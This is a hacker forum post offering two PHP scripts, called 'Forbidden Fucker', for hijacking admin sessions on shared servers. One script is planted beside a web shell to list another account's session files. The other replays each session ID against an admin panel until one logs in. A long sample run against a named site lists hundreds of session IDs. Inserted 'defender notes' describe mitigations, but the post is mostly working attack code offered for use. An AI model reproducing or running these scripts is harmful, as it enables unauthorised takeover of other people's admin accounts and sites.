
Bypassing server security via auto session hijacking :)

Hi Guys
How r u doing?
Good or not , doesn't matter :D:D
Long time since my last post , hah!!!
i just want to refresh ur minds and show u Good technique for Bypassing (the over security) of some servers
1st of all let's put some rules
1 - the targeted script must depend on sessions on admin panel
otherwise , it's not gonna work
2 - u should have little php knowledge to modify the script 4 ur own using

Got it?
let's go
1st script will be uploaded @ the Server , beside ur shell



<?
/*
+-------------------------------------------+
|    Forbidden Fucker (public Edition)      |
|          Coded By i-Hmx & Mango          |
|      n0p1337@gmail.com - ha.xxor.se      |
+-------------------------------------------+
*/
// Server-side half of the technique the post describes: a dropped script that
// lists the session files owned by a given OS user. The only input check is
// that the POST field is non-empty; anyone who can reach the file can query it.
// Defender note: everything below depends on a session save path that is shared
// by several accounts and readable by the web-server user (the sample run at the
// bottom of the page shows /tmp). A per-site session.save_path that only that
// site's own process user can open removes the precondition; a new web-root
// file calling session_save_path()/opendir() is a usable file-integrity alert.
if($_POST['targetuser']=='')
{
die('Error');
}
// OS user name (or uid, see findSessIn) whose session files are wanted.
$user=$_POST['targetuser'];
// Return value discarded; this call has no effect.
session_save_path();
$sesspath = session_save_path();
// Handler reported by the session module; falls back to the ini value.
$sessmod = session_module_name();
if(empty($sessmod))$sessmod = ini_get('session.save_handler');
echo "[i] Session save handler: $sessmod\n";
// Only the 'files' handler keeps sessions on disk; any other handler is
// reported but the directory listing is attempted regardless.
if($sessmod !== 'files'){
echo "[!] Possible Error: session.save_handler is set to '$sessmod' instead of 'files'. Trying anyway.\n";
}

// Resolve the directory: session_save_path(), then the ini setting, then the
// system temp dir, else abort.
if(empty($sesspath)){
$sesspath = ini_get('session.save_path');
if(empty($sesspath)){
  if(function_exists('sys_get_temp_dir')){
  $sesspath = sys_get_temp_dir();
  }else{
  die('Error:Cant fins session save path. Try setting it manualy.');
  }
}
}
// session.save_path may be written "N;[MODE;]/dir"; the directory is the last
// ';'-separated segment. (array_pop() on a function result raises an
// "only variables should be passed by reference" notice.)
$sesspath = array_pop(explode(';',$sesspath));
echo "[i] Session save path: $sesspath\n";
// Enumerate sessions and their owner.
clearstatcache();
echo "  + Sessions found\n";
// findSessIn() prints one matching path per line, suffixed with '<<', which the
// client-side script on this page keys on; false means opendir() failed.
if(!findSessIn($sesspath,$user)){
die("[!] Error: Cannot open the session save path.\n");
}

/**
 * Walk $dir and print the path of every 'sess_*' file whose owner matches $uz.
 *
 * @param string $dir directory to scan (the resolved session save path)
 * @param string $uz  owner to match: compared loosely (==) against the user
 *                    name from posix_getpwuid(), or against the raw uid when
 *                    that function is unavailable
 * @return bool false if $dir cannot be opened, true otherwise (even when
 *              nothing matched)
 *
 * Output: each hit is echoed as "<path><<\n"; the trailing '<<' is the marker
 * the second script on this page filters on.
 * Defender note: fileowner() succeeding on another account's session file is
 * the condition to remove — a shared, traversable save path is the weakness,
 * not the session IDs themselves.
 */
function findSessIn($dir,$uz){
if(!($handler = opendir($dir))){
  return false;
}
// readdir() loop; an entry literally named "0" would end the loop early
// because the assignment result is tested for truthiness.
while ($file = readdir($handler)){
  $path = substr($dir, -1) === DIRECTORY_SEPARATOR ? $dir.$file : $dir.DIRECTORY_SEPARATOR.$file;
  if (substr($file, 0, 5) === 'sess_'){
  $owner = fileowner($path);
  // Map the uid to a name when the POSIX extension is present.
  if(function_exists('posix_getpwuid')){
    $owner = posix_getpwuid($owner);
    $owner = $owner['name'];
  }
    if($owner==$uz)
    {
  // echo "$owner $path";
  echo "$path<<\n";
  }
  // Single-character subdirectories are the layout produced when
  // session.save_path sets a directory depth ("N;/dir").
  }elseif(strlen($file) === 1 && is_dir($path) && $file !== '.'){
  findSessIn($path,$user);
  }
}
closedir($handler);
return true;
}
?>

let's call it fa.php for Example
it's easy to understand
yet we will need another tool on our pc

<?
/*
| session auth testing part coded by i-Hmx
  + n0p1337@gmail.com
| session enum part Coded By Mango
  + ha.xxor.se
*/
// Client-side half, run locally with the PHP CLI (see the sample run below).
// Banner, then two prompts read from STDIN.
echo "\n+-------------------------------------------+\n";
echo "|    Forbidden Fucker (public Edition)      |\n";
echo "|          Coded By i-Hmx & Mango          |\n";
echo "|      n0p1337@gmail.com - ha.xxor.se      |\n";
echo "+-------------------------------------------+\n";
echo "Enumorator Url# ";
// Host and path of the uploaded enumerator script; any 'http://' prefix is
// dropped because get() adds its own.
$unumurl=str_replace('http://','',trim(fgets(STDIN)));
echo "Target User# ";
// OS user name forwarded as the 'targetuser' POST field.
$uzz=trim(fgets(STDIN));
/**
 * Fetch "http://$url" with curl and return the response body.
 *
 * @param string $url     host and path without scheme (plain HTTP is hardcoded)
 * @param string $post    value for CURLOPT_POSTFIELDS; set even when empty
 * @param string $cookies raw Cookie header value
 * @param string $reffer  Referer header value
 * @return string|false body on success, false when curl_exec() fails
 *
 * Redirects are followed (CURLOPT_FOLLOWLOCATION) and the whole transfer is
 * capped at 20 seconds. NOTE(review): setting CURLOPT_POSTFIELDS presumably
 * turns every call into a POST, including the '' case — confirm against the
 * curl extension in use.
 */
function get($url,$post,$cookies,$reffer){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,"http://".$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl,CURLOPT_COOKIE,$cookies);
curl_setopt($curl, CURLOPT_REFERER, $reffer);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
/**
 * Return the text between the first $start and the following $end in $string.
 *
 * A space is prepended so that a $start found at the very beginning lands at
 * offset 1; the loose `== 0` test therefore fires only when strpos() returns
 * false (not found) and the result is "". If $end is absent, strpos() returns
 * false, $len goes negative, and substr() trims that many bytes from the end
 * instead of failing.
 *
 * @param string $string text to search
 * @param string $start  opening delimiter (excluded from the result)
 * @param string $end    closing delimiter (excluded from the result)
 * @return string
 */
function kastr($string, $start, $end){
        $string = " ".$string;
        $ini = strpos($string,$start);
        if ($ini == 0) return "";
        $ini += strlen($start);
        $len = strpos($string,$end,$ini) - $ini;
        return substr($string,$ini,$len);
}
// Results are appended to a scratch file in the current directory and re-read
// with file(); anything left over from an earlier run that never reached the
// unlink() below would be processed as well.
$faresult=fopen('faris_1337.r1z','ab');
// One POST to the enumerator; its output (handler, path, "<path><<" lines) is
// echoed locally and saved.
$ok=get("$unumurl","targetuser=$uzz",'','');
echo $ok;
fwrite($faresult,$ok);
$myf=file('./faris_1337.r1z');
echo "\n-----------------------------------------\nAdmin Page Url# ";
$target=str_replace('http://','',trim(fgets(STDIN)));
echo "Good Login Key# ";
// Marker expected in the admin page only for an authenticated session. eregi()
// treats it as a case-insensitive POSIX regex, not a literal string (PHP 5-era
// API, removed in PHP 7.0).
$key=trim(fgets(STDIN));
// Defender note: this loop sends one request to the admin URL per candidate,
// back to back, each carrying a different PHPSESSID cookie from the same
// client — that is the pattern to alert on in the admin page's access log.
// The only credential presented is the cookie, so the durable fix is upstream:
// session storage isolated per account, and short session lifetimes/GC.
foreach($myf as $sess)
{
// Only lines carrying the '<<' marker printed by findSessIn() are candidates.
if(eregi('<<',$sess))
{
  // Take what lies between the first '_' in the line and the marker; in the
  // sample run that '_' is the one in "sess_", leaving the bare session id.
  $sess_id=kastr($sess,'_','<<');
  $test=get($target,'',"PHPSESSID=$sess_id;",'');
  if(eregi($key,$test))
  {
  echo "[*] $sess_id > Valid session\n";
  }
  else
  {
  echo "- $sess_id > Failed\n";
  }
}
}
echo "[+] Done\n";
fclose($faresult);
unlink('faris_1337.r1z');
?>
it's easy , readable Code
u may need to modify this ,
specially this line
if(eregi('<<',$sess))
usage and idea are so easy
the 1st script will get the sessions for the targeted user
pass them to the script on our pc , which in turn tests all sessions on the admin panel till the logged in mark is found
example
PhoeniX@PhoeniX-Lab /var
# php x.php

+-------------------------------------------+
|    Forbidden Fucker (public Edition)      |
|          Coded By i-Hmx & Mango          |
|      n0p1337@gmail.com - ha.xxor.se      |
+-------------------------------------------+
Enumorator Url# www.almohamadein.com/fa.php
Target User# asa7be
[i] Session save handler: files
[i] Session save path: /tmp
  + Sessions found
/tmp/sess_a60d366d9a2ad7a33516d742e0acb3c0<<
/tmp/sess_7e6b48474d4622bbbfdb44a0abee3ae5<<
/tmp/sess_cf1487d4d364d0d5b5da78d6a2f1c829<<
/tmp/sess_b490eaf9813e7ce2f9f970ec5d5148a8<<
/tmp/sess_69fb5a0be14029efa7823f36bba950a3<<
/tmp/sess_af20ab592b6436a4b4662b3ef9d20949<<
/tmp/sess_39492febe0be4657c8b74467a928ed86<<
/tmp/sess_08628cb08a83a88fb3b13cf0831ed2c2<<
/tmp/sess_3fe3f2dfd3c53e47a47f4a287023e4f1<<
/tmp/sess_7d3b2096da471dc454c7ebe37ea391a8<<
/tmp/sess_0ae576840230a014d66d13876274b4ec<<
/tmp/sess_d14f707dbacf3fc150d028d948a7783a<<
/tmp/sess_3adfad96853e169b614eab8cbb33f399<<
/tmp/sess_e8eb5d28f2e9477146b5d77a4641f2fa<<
/tmp/sess_7054ba034eecd52aaee4daf29b3f083f<<
/tmp/sess_a6b7407deff4c1ecf006beeb75816740<<
/tmp/sess_e8cebcc6e019029994a2ace049194c08<<
/tmp/sess_26172952f18902859ff1cc6db5e7a5c2<<
/tmp/sess_82acf501eee50586fafad1474ad3e6f8<<
/tmp/sess_bcc1e8dab78046443c25666ca3155e32<<
/tmp/sess_323a64eadbe2a9f3d65c92698a8a80c8<<
/tmp/sess_9ec31c6914e31acd0e309c062162e7f9<<
/tmp/sess_936443410e7ff83a2ed87436fb385c8c<<
/tmp/sess_cd5a0c95753e3edabe324b638181592d<<
/tmp/sess_6281d2ea4f929d5643f543c7ba6afe56<<
/tmp/sess_c28491c9d0761f286653d8dd2accf8f0<<
/tmp/sess_8244ba71a97f1a014c4af61185a3d9ca<<
/tmp/sess_d4a7db7eb38c2d27f3ae1c9b443c53d5<<
/tmp/sess_8156a7a26b3a3748ca0b29a5c82cb260<<
/tmp/sess_f6721942c9b08642eec43e207257b778<<
/tmp/sess_5280dd75b3910cc639a5e58c84fd7080<<
/tmp/sess_4423975c2c82fb9bb4079fd16aaeaedf<<
/tmp/sess_9862eb6c6ea821765edcf2d1041782c0<<
/tmp/sess_cf232579f2b648561151e5205faebb65<<
/tmp/sess_7ab7ca51d0d6dc9637e5b6bbed0204a7<<
/tmp/sess_b8e43af631a90288ef333ac6ed08a2fa<<
/tmp/sess_f984456a3e14b3ebc26504e71f2ba6e2<<
/tmp/sess_fc3c8586efdba8d2976d4cfddafee65a<<
/tmp/sess_2435e3ec36a579b7cdf48c0a6fa86607<<
/tmp/sess_771bfc8b10555433a94971d8768b7bcd<<
/tmp/sess_3065d2488dedaa0d85bb51c778ca2e02<<
/tmp/sess_6de0ec0941188d2ab4c8d7c25fbd879a<<
/tmp/sess_6711a02c5c824797432bfd4ec1b05ab3<<
/tmp/sess_110f95a0a542eb24ff2965b7e91b683e<<
/tmp/sess_7c469c0b53675efc5809c23b5d404ddc<<
/tmp/sess_2da7f789d7fa28dd08184e62fc86f00f<<
/tmp/sess_a17131c2d2d08933f8c57a121081ee03<<
/tmp/sess_8cc3e309addc46b9cf635145c49a8973<<
/tmp/sess_7ffbb0bd00cdbfe6669607ecc95b58a4<<
/tmp/sess_28dc7980b68af641a4c16a4e79388474<<
/tmp/sess_3bfdbf75f3f3b1e1f50d278e36e4da17<<
/tmp/sess_31f3296262c9ff2dbfa53e4ee99e3f9b<<
/tmp/sess_80635f37e8545085b32266330095f4f9<<
/tmp/sess_0a9765152480ac5ba5a41ab1906658cd<<
/tmp/sess_0f82aa0830eea9e1af47fe8e8e02e58b<<
/tmp/sess_5f55b1294e8d616264faf8282cad471a<<
/tmp/sess_723fd84101c50b3305a3a3dbb90dd6ae<<
/tmp/sess_a80a7d6fc50796f6c45b51b23a17e5f1<<
/tmp/sess_571e25546b5a77030c46c7bda02da2ae<<
/tmp/sess_70bcefe593b4a1e975fab08bbf0538f8<<
/tmp/sess_abb38919e4b679948b981a27975fd9e4<<
/tmp/sess_410d02d76f2af51a976d9becc5ad7360<<
/tmp/sess_f46d7ee19188fd870a3cb4e74eb82ba4<<
/tmp/sess_874c6f94105e69719cd7bafbd3f33ded<<
/tmp/sess_c3649de003ed87c92f448198deeb98cf<<
/tmp/sess_077fa3db98ea3bec4633b43d50900e3b<<
/tmp/sess_a50987b14f8548bc0a5ef371c8179285<<
/tmp/sess_43632ca49255779d48d911256520d66c<<
/tmp/sess_7433b04ae2faf5d51a48cd0f41664eb9<<
/tmp/sess_7fe2958665681c8570ae22b379502043<<
/tmp/sess_378b4ef8eeae9838f26c6f896ca997be<<
/tmp/sess_451a548ce742adafec7d9ffc05c10872<<
/tmp/sess_8c516323c603b3e9011bb82eb344cc1d<<
/tmp/sess_3ab630aa16811629f1d34dd9b9f25c29<<
/tmp/sess_b509495b5e46ecb88b78c27faa0c6288<<
/tmp/sess_e83d4ba01fcfa4cab704678f9ecfa51c<<
/tmp/sess_0ab0ade3d9edabdb6ad3d832bbc6e66b<<
/tmp/sess_23d2d65f702d2462e9744e06f2c36cec<<
/tmp/sess_9d9410587754ce2353b21796f02ad1d4<<
/tmp/sess_6d1cbe5609e691ca243c830b49e5d5fd<<
/tmp/sess_a50dd20343dba951e213a0fbaa6615eb<<
/tmp/sess_6a760531df12d3e85ea0df9e6f346c30<<
/tmp/sess_ba80a6a35559f16c0c8aca7ae13b6736<<
/tmp/sess_ebe9d1d5fc02c6f3af7f0bf2a7f1e2b1<<
/tmp/sess_d3e60149a7c62e9e1652b70d78c2a536<<
/tmp/sess_5e8828406dadf773a13a5eda90cb01a1<<
/tmp/sess_7b97c58c5470e9a7e06d8132a8cc6ba5<<
/tmp/sess_679ad5991ec8f4b3baf12e1338146bfd<<
/tmp/sess_36862e86570553ff79f82ab1000c950e<<
/tmp/sess_e7027392633424b0920f1115d51cb57e<<
/tmp/sess_a2add16dd0c4cecc5b300c2f6aea3775<<
/tmp/sess_ec6a51f74a5324b4e0418fe1dae313b4<<
/tmp/sess_bf36136dac9d8eacec78d63364ca5e78<<
/tmp/sess_c66710809fe25109983234ba766ef078<<
/tmp/sess_efdbe19dc0b207cfae70fc684400e755<<
/tmp/sess_5c79762226632f12c48f77ca39e4f6d4<<
/tmp/sess_a8c54d8747c85fd88c768799e3e7fb48<<
/tmp/sess_830df99844aeff8ec7a98014d6cb79ab<<
/tmp/sess_a94da4fa0dae3ab34a8d4cdc8546da5d<<
/tmp/sess_1bf95bb824e0be2ac7c6864e4b5b629f<<
/tmp/sess_238a0940a15063b5042de1a509059edd<<
/tmp/sess_654e9509e5d23212a4ccd32bd69dc9dc<<
/tmp/sess_6e84009801bc584a307d4ce27b120fbd<<
/tmp/sess_e6c167edcd951985e0595013af05a7e2<<
/tmp/sess_8ca0100ece878b63b88fa85f25f054d2<<
/tmp/sess_c24bc1d6fb9f524ed80ed61819d59640<<
/tmp/sess_0eaba2a8327d34209985b740b8f18557<<
/tmp/sess_7be052169d6f5ca251ff7d10d68eb345<<
/tmp/sess_6037abf60876435e5bd13672de4a32fe<<
/tmp/sess_2ad54dcbcc848b1fb70cf3f6a3b06517<<
/tmp/sess_238e28aab9ef9697068efe684a5e461c<<
/tmp/sess_827fefee02d53f4fe95d7f3819ff52f9<<
/tmp/sess_978914083fca5fe8fbb4d5207c1dd9bb<<
/tmp/sess_b1b3023752d2a4832b453b178ac9a63e<<
/tmp/sess_dd7c6039b8c03ee2f77f9475db016cc6<<
/tmp/sess_e81d5420519f8dd2003e6c86373daeb6<<
/tmp/sess_f05286d67bacc34963b784b014ff0f89<<
/tmp/sess_47d76307368f2d14be7acf638ceb9ebc<<
/tmp/sess_066fe1f99bee0e1f5d0acf3a6a2ca3b5<<
/tmp/sess_b169d4c17bed4339a9fd916d64c93ed9<<
/tmp/sess_ef40956680f352055b9ef9844ae84500<<
/tmp/sess_0b323896f0a331fd8af8c556a07caf03<<
/tmp/sess_c7f952312d9c5d2bcc27cd3e5189aecb<<
/tmp/sess_e27b9a5895c8a0ac961bad6941449d64<<
/tmp/sess_d37bf8c132bf0b9b01641c46ae0c1a06<<
/tmp/sess_02f84ee58490f0c237af5792d3214555<<
/tmp/sess_f3dab204d7410a97e398fd3f71ce4ac5<<
/tmp/sess_0e385e13dd2ece53a5a12bd8ecf1a00e<<
/tmp/sess_2c755829fb8571bf79ccaede17a8bd0d<<
/tmp/sess_bb9ae655e590866e497912d95426e8f3<<
/tmp/sess_2ebb2db4d26240a5d8d8e4f1a7b61530<<
/tmp/sess_9bca7095afe849144d4afbba4670969b<<
/tmp/sess_ad3dee380ed4231e3756fafca295daaa<<
/tmp/sess_301ef6153b88859deb7351e28ec29543<<
/tmp/sess_cc241d8b0a7e55062be401fab13916bb<<
/tmp/sess_3dfd093ee6bead6938c3c49a5c925a5b<<
/tmp/sess_7cc93e77d8c93f9e63337bc9b81e8cb7<<
/tmp/sess_fdb4933c0d8891def393da4a9fbc5ac5<<
/tmp/sess_8b4776f140fa01110059a54c2f7f240e<<
/tmp/sess_46f45aa0d9f880eeb5dfbe758d1a7327<<
/tmp/sess_54eb68df43f7fc1a6fcb5b16a1e66fd6<<
/tmp/sess_162f42ff9b908212d5e4e9042911ae3d<<
/tmp/sess_b2174fb7281af759969af4d5a58c21ec<<
/tmp/sess_ce3443f4e4950d5a7428c3b15a1f2643<<
/tmp/sess_b81393e9d6f99eb621f0c712ee779937<<
/tmp/sess_42e84b25024c04c17c30ff45ed6559dc<<
/tmp/sess_9283c9d7358084482371c1f4d30d221a<<
/tmp/sess_a690e8f5449c1de111122b9ff298944b<<
/tmp/sess_8cff19c13309be6bbfb2084ab13b2c8b<<
/tmp/sess_2426b1fa462d6d92c1433163ee4f8131<<
/tmp/sess_a30b17a56ff48fc727c124b105158ef8<<
/tmp/sess_4621e910a3477097c11c72886704435e<<
/tmp/sess_38973462fe404f2aa604325a4290edca<<
/tmp/sess_7083b017b35b82a030ebf07d0d12ae75<<
/tmp/sess_5f86f48a33611d549445a2aa2a8a620f<<
/tmp/sess_4271bd92af74c429f6ad82f2a3e55303<<
/tmp/sess_70cb08d2da77d3b5094891567c60ad78<<
/tmp/sess_e68b3d944bc533debacf8f2ff3300d08<<
/tmp/sess_ad801eab92939c07ade9535e0f8f09e7<<
/tmp/sess_c8f84b829c33a6baf85d9ee697ae57f8<<
/tmp/sess_7f073ed16cf69681314b0ac85366d847<<
/tmp/sess_336d19c117504ad8b3b0d86ef1057b8e<<
/tmp/sess_dc874f7bb1aabccd04947bb92f643c6d<<
/tmp/sess_86828d161dce9718d6a7e0622323af55<<
/tmp/sess_def1f31aae314d94c572dfed1335bf00<<
/tmp/sess_6bc16e944ea8261457bd63d3baf6e6b2<<
/tmp/sess_c82be39417a42976501e29b16b7bb8a0<<
/tmp/sess_72ea61a1b52b41ef268c2f24f44c3953<<
/tmp/sess_0648873688ff2f20a9c544a9e529cad1<<
/tmp/sess_2510634e9e90ca29cefc2629bead14e3<<
/tmp/sess_8d792825deb6a7bcc7f493a40e4fc9ed<<
/tmp/sess_af3a5c7db1034742e7e0508b240bdb59<<
/tmp/sess_f228f32eb7786465a271db83ae7818ab<<
/tmp/sess_7826075ca64ef0ad308f37813b82cf23<<
/tmp/sess_183fe09c4dd7a96e68d68721a63246d9<<
/tmp/sess_fd9716b7a92e771eb5be236775697536<<
/tmp/sess_296e4f943757319e8d798273e646f18a<<
/tmp/sess_8cfb06518ec3567b0f75f9a3c01ae7f8<<
/tmp/sess_318ae5a08752dd30c6ac19f7bb738180<<
/tmp/sess_fc444804a1ff5b8345debdba6ad193ac<<
/tmp/sess_c1cbe69edef4159e2e82ef0f477e63e9<<
/tmp/sess_56f6b0bdfbb3601501ca3c47aac3c096<<
/tmp/sess_4386c0d9d50d4757523ac9acf7f73f46<<
/tmp/sess_d6b47d8ffd6fd4cd8fa5af41607187b9<<
/tmp/sess_b6b388dbbcda646f8387512aaf939d6d<<
/tmp/sess_6d43b058a66825250ea28a3ed57f52ca<<
/tmp/sess_5c55e2875b318b851d1b9fad54470634<<
/tmp/sess_c23cccdc03dfa87e62c472ec6b2c78f0<<
/tmp/sess_26dafebf45169ca7a4b3d34ea8cb5d05<<
/tmp/sess_e8c879da44d11c5cfa4ca32410f1fc8b<<
/tmp/sess_d10da066c91ec2fae2ae96ba228175f5<<
/tmp/sess_4cae550a6b5bb43e637235c84bbc7038<<
/tmp/sess_344f938e4c01660fcff9fd2757914d79<<
/tmp/sess_cf00f00fe396391fd7326d0a552b7701<<
/tmp/sess_7138d191898888a15701848c410470be<<
/tmp/sess_142293add53e73025eb2393f12fa5bee<<
/tmp/sess_e8abf327b1545ca8200051c7af0d57a8<<
/tmp/sess_c9783e97fd38a49e16df0c4e012c7c80<<
/tmp/sess_cbaa1e16bb4f237233361d4385e6ed4f<<
/tmp/sess_adf206253ad579ae1a3804fd1988b3f3<<
/tmp/sess_10cbf6b95e1981216fae32760a5b2d96<<
/tmp/sess_7c53b9e8dca7405f2c5c8455fe5c721e<<
/tmp/sess_4037db64c7bb9de5cd4532cc8e157d01<<
/tmp/sess_660f1e2a4035ff82bac759cb8806209a<<
/tmp/sess_f7a6d21082fc89cd0f1c3115f1bdcec4<<
/tmp/sess_3b7847641d9451edaab6fd09cd939d11<<
/tmp/sess_487dabf13c0919916dc4d0fbe9597a7b<<
/tmp/sess_34110d4e1324bad22b199041ca848efd<<
/tmp/sess_d9372914ca9cb5170d0c6e3716977ad1<<
/tmp/sess_74bbe473b98407430f6d8fc294bef487<<
/tmp/sess_d468f83226771a5c384ce4d2b684b44a<<
/tmp/sess_0fd8b9a66a19baa549dd8cb91f107d0d<<
/tmp/sess_733488179e67470833b95742f2dc878a<<
/tmp/sess_ceb7cb4a7c3f33d4359036206def151d<<
/tmp/sess_e8164648cb091494e34ce13ea417c121<<
/tmp/sess_d6a36c2338cba086d268c4dcdbbe29c6<<
/tmp/sess_5a10dcc74c6ded4ae3b65bc035d87025<<
/tmp/sess_b77eee191237ae4ac0f667297888aaa0<<
/tmp/sess_55ce9fa5073fbb154ff7d736771c4a79<<
/tmp/sess_1e62ac02ee89c37abaa2da79a03d1537<<
/tmp/sess_2151e01a4889658b0c96b58a07e90824<<
/tmp/sess_d02c0bc8298128982c3a7bbf72aca2d7<<
/tmp/sess_d8eb40e4f4abfd5a0ff3c5c016f07a59<<
/tmp/sess_fad1f677cd1b67791b48c4d7aa63b092<<
/tmp/sess_248ba2ff1c58bd6927f0ea88d5d411c5<<
/tmp/sess_0b63772866a4569dcf15af716aafd844<<
/tmp/sess_8cf2b9b2b723ab92f9873ee4787ca879<<
/tmp/sess_fd458c01083f553a1039c1e87dff4f8a<<
/tmp/sess_98946f70a4e6ce4d39701eb0c139cd6a<<
/tmp/sess_d90346420f9a687dd2c45ce36057a482<<
/tmp/sess_4c7f1c7bf7d75e64aa254aa9577b9ec7<<
/tmp/sess_b7621f60a52a0cedc629182e3b148130<<
/tmp/sess_0378a4abf4c9e701d9d34b5a4ee62166<<
/tmp/sess_39bfe3b5b7d72bad29d350ab2157e2db<<
/tmp/sess_c61c3e6533103af0bc8b771c2706b424<<
/tmp/sess_b4849d9b0d7adf4dd878302850b075c8<<
/tmp/sess_063bff82b89cfabefcfafbd2113a845c<<
/tmp/sess_af13d560f51f2b1c2e26e2461de5682f<<
/tmp/sess_83c89822b34cbad9d9d1d715f3136db9<<
/tmp/sess_0bc139f8d22ce18632c3aae794c02cc5<<
/tmp/sess_cb80ad982f95801693478140132762be<<
/tmp/sess_db3a872d9d8901e8df6cb7cb1c24c013<<
/tmp/sess_007dbdecfdd32372aed04c43dcd1126d<<
/tmp/sess_7f1a8c4223746a0faa3263352d3cb7fc<<
/tmp/sess_223d4d2cb310bd1c6e92fb757429c956<<
/tmp/sess_932c9a0298cf160903858ca87e64adb0<<
/tmp/sess_19fdeb5954e659f2e40f17ce71abbcf1<<
/tmp/sess_7d0c4acb21fdb12f4907a33d5347edd9<<
/tmp/sess_6b69216b07ca94d276bf17b098a722a5<<
/tmp/sess_3e8aafd25ddb43a511963d09b4e91f3c<<
/tmp/sess_494ab351a5956f3949de2f624c353ea3<<
/tmp/sess_d1ff277946840ba51832b9f707c876ab<<
/tmp/sess_a8cf318aada48c46334fa7fd576abfad<<
/tmp/sess_38848946a7fa2b95f51d70dbaad5d014<<
/tmp/sess_c5588e3e6a6067f406bac5ab6f976ccc<<
/tmp/sess_0407d1740772ecc6f228cd02b6e3a2f0<<
/tmp/sess_e160d329a50ebc5466ac0b03344583a8<<
/tmp/sess_bab50bc73fad00dec6e0f60c39a1e75e<<
/tmp/sess_afd127205676f750cfbdb7df3fa8cb8f<<
/tmp/sess_dcde16afd1b2fe58064354e14dc2dd02<<
/tmp/sess_6e66cc08eda3829148ada3df6f25ff56<<
/tmp/sess_d73e039d4ba11745e96551ee0e7bf2a8<<
/tmp/sess_9f38937e729cc840cdfecc4aac0d0c2a<<
/tmp/sess_5883c48744b79dd47913bc7cab9b6ac9<<
/tmp/sess_d4ad59d23e050100214782c80d98b272<<
/tmp/sess_494f48c34673cbb8179e34c74c4cfdb8<<
/tmp/sess_2247960fffd053f22321ad78005c73f5<<
/tmp/sess_b03810d85b12d59b0a29ef04a583d147<<
/tmp/sess_542c6251f7b291cfbf2ce14a3331890f<<
/tmp/sess_0dec5323b4a63eecb3c4a893fa04f8c7<<
/tmp/sess_e220d02a8439c5f87296534a4327d427<<
/tmp/sess_4782e8e835ad1b68c3cdc4570f89d7e0<<
/tmp/sess_4d00c3b14501c8e9b713d3cbb882a397<<
/tmp/sess_45ca6329a3041e9036fbea47baf1e17b<<
/tmp/sess_2343a3de89a827ad06aafc8f7ea5980f<<
/tmp/sess_4a3d8e2bd869836083e40a91552d0cb3<<
/tmp/sess_f153075c54e6a33dbf47997b43b25e19<<
/tmp/sess_a4a60070254d4440e633b3c48af3c42c<<
/tmp/sess_343ff6799a8beb63974b95e89ef54174<<
/tmp/sess_1279d687a6653061e1c6ccc1aa4477ed<<
/tmp/sess_7c991e025a0688ee297511965392c6d8<<
/tmp/sess_f5eae35471f20cc88c69745c31cf4cb0<<
/tmp/sess_e90ebee9c31c3cad3e6171b81345cb98<<
/tmp/sess_d748eff0ac6a990a7889590f311d1040<<
/tmp/sess_61a3b26883cf36eae8d1c571f0e44faa<<
/tmp/sess_95e067885380815a21ee576672926d9d<<
/tmp/sess_f0e1e2a65198892431d6899cc22d3f54<<
/tmp/sess_298e22549fdf7908e54eef23225cda4d<<
/tmp/sess_56262e8513a9e3aac35837b5e708bd6d<<
/tmp/sess_1aba1f4ff80c713f6464a8f11b01e10c<<
/tmp/sess_5cd36d4f2721904ab9d1a5286f8685ba<<
/tmp/sess_911eb12d7a9b12b6d6fce4c9be073743<<
/tmp/sess_da679ccf3255006c9864b7a4498e044d<<
/tmp/sess_f64f9fe490285eaa913993c148ab8c73<<
/tmp/sess_03572aa3d530dc90ceb002ce252e8c95<<
/tmp/sess_1071bb1b5d4e337dfc150c3964be75ab<<
/tmp/sess_7422d64892b0e2d71f8209034b760afb<<
/tmp/sess_2a14a83442badaf2b607f17b9682f8ec<<
/tmp/sess_2df9ebe2474aa78734e83c1e3d858132<<
/tmp/sess_d463a0a7738cd4a1e6e6f25a02d9bbfc<<
/tmp/sess_6d6aaebe06020059f97bd8a5e66bd0eb<<
/tmp/sess_17cb5789c93914dfd9d7b8e5197cb087<<
/tmp/sess_36e725be8727e6103568aae32a31bed2<<
/tmp/sess_1fd6ecce10118d2ebf200029f1aebeae<<
/tmp/sess_481c5c943f35bc71d4d06130105320a0<<
/tmp/sess_d023da56c8c24bb41a55f6dde0a148ce<<
/tmp/sess_fc35358c317952fcaa8a6bc759ac2e3d<<
/tmp/sess_8b267797f9eb71fe41f2ecffdfe22d4c<<
/tmp/sess_6c3d42885119f1c1df23a378df4adfa9<<
/tmp/sess_1f8c715044953df6fa400ad96425081c<<
/tmp/sess_89cb3ace74df603112720fa16f56e964<<
/tmp/sess_5ae54390b6ffd697285eba33836e0d4c<<
/tmp/sess_f658b26b1d4b1823b72807afd6d7cbb5<<
/tmp/sess_31950b751318f1cdd864b8f07f257b3a<<
/tmp/sess_712bce140a8932861c4acfdde69ed606<<
/tmp/sess_244903cccc40b0997d3a32c903c0e6fd<<
/tmp/sess_ae1e0bed77217778ff5999f13914ae7c<<
/tmp/sess_1b8b4513137dbc828015600288643cce<<
/tmp/sess_bc5d1809ce92e23611ccb33f98dc96c0<<
/tmp/sess_d0c03318ddcbbb9422ccdd282738b141<<
/tmp/sess_090caaaecad671a62c58833043f1497d<<
/tmp/sess_66e3342e13b26b0a2da8dfd8c28fb687<<
/tmp/sess_d6b2f714b5e9388727a822e9e03fb552<<
/tmp/sess_7f52e36e0fb83a2c13a3d879ac475095<<
/tmp/sess_5b9012d763bfb7c45deb67aff89b7907<<
/tmp/sess_452adb66efeac42cce802b23378b52cd<<
/tmp/sess_5ad2bbb8fdbd8102db821da0d0e1255b<<
/tmp/sess_7d51cd9d3d86caadaeacf8d9a7f098ab<<
/tmp/sess_835fcbb27dde8a9df6819f95a9b9862a<<
/tmp/sess_e87f9716e8e4b5dfdd82141573786ade<<
/tmp/sess_579b5e746ac7fd8d8e4246924806b2ff<<
/tmp/sess_a555eb67a2335369217ddeddbbc8e155<<
/tmp/sess_db24b9d405f1d9f42a9a7e9e002bc255<<
/tmp/sess_bf67c983659c5705167173e28bc516c1<<
/tmp/sess_837f2700222201c52095de401c2adacf<<
/tmp/sess_3251c683e48df6e05a7e9211f1726f34<<
/tmp/sess_624cafacc4f6eda3fcc97f0cd9db36e6<<
